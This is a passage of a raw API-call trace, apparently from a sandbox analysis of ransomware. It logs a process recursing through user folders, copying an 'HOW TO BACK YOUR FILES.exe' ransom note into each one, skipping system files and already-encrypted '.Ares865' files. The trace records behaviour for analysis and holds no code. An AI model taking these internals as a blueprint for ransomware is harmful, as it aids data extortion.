dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.647] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.647] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0065.647] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0065.647] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d36d8 | out: hHeap=0x2b0000) returned 1 [0065.647] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0065.647] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned 99 [0065.647] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0065.647] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.647] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.648] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.648] GetLastError () returned 0x0 [0065.648] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.648] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.648] CloseHandle (hObject=0x12c) returned 1 [0065.648] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.648] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.648] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.648] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.648] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.648] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.648] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.648] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.648] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.648] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.649] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.649] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="DESKTO~1.ARE")) returned 1 [0065.649] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.649] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0065.649] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0065.649] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0065.649] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0065.649] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0065.649] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0065.649] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0065.649] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0065.649] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0065.649] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0065.649] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0065.649] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0065.649] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0065.649] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*") returned 101 [0065.649] lstrcpyW (in: lpString1=0x2cce4c8, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0065.649] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0065.649] lstrlenW (lpString="Ares865") returned 7 [0065.649] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0065.649] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.649] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.649] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.649] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.649] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0065.649] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft" [0065.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0065.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0065.649] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft") returned 63 [0065.649] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft" [0065.649] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.650] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.650] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.650] GetLastError () returned 0x0 [0065.650] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.650] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.650] CloseHandle (hObject=0x12c) returned 1 [0065.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.650] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.650] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.651] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.651] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.651] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.651] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.651] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.651] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.651] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.651] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.651] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0065.651] lstrcmpiW (lpString1="Credentials", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.651] lstrcmpiW (lpString1="Credentials", lpString2="aoldtz.exe") returned 1 [0065.651] lstrcmpiW (lpString1="Credentials", lpString2=".") returned 1 [0065.651] lstrcmpiW (lpString1="Credentials", lpString2="..") returned 1 [0065.651] lstrcmpiW (lpString1="Credentials", lpString2="windows") returned -1 [0065.651] lstrcmpiW (lpString1="Credentials", lpString2="bootmgr") returned 1 [0065.651] lstrcmpiW (lpString1="Credentials", lpString2="temp") returned -1 [0065.651] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar" [0065.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d78f8 | out: hHeap=0x2b0000) returned 1 [0065.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0065.651] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar") returned 79 [0065.651] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar" [0065.652] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.652] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.652] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.652] GetLastError () returned 0x0 [0065.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.652] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.652] CloseHandle (hObject=0x12c) returned 1 [0065.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.652] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.652] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559a4d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559a4d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.653] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.653] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.653] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0065.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0065.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0065.653] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned 87 [0065.653] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0065.653] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.653] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.653] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.654] GetLastError () returned 0x0 [0065.654] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.654] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.654] CloseHandle (hObject=0x12c) returned 1 [0065.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.654] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.654] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.654] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.654] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.654] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media" [0065.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7850 | out: hHeap=0x2b0000) returned 1 [0065.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2540 | out: hHeap=0x2b0000) returned 1 [0065.654] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media") returned 77 [0065.654] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media" [0065.660] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.660] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.660] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.661] GetLastError () returned 0x0 [0065.661] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.661] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.661] CloseHandle (hObject=0x120) returned 1 [0065.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.661] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.661] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.661] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.661] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.661] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0" [0065.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e27c0 | out: hHeap=0x2b0000) returned 1 [0065.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2540 | out: hHeap=0x2b0000) returned 1 [0065.661] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0") returned 82 [0065.661] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0" [0065.661] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.661] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.662] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.662] GetLastError () returned 0x0 [0065.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.662] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.662] CloseHandle (hObject=0x120) returned 1 [0065.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.662] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.662] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559cae60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559cae60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", 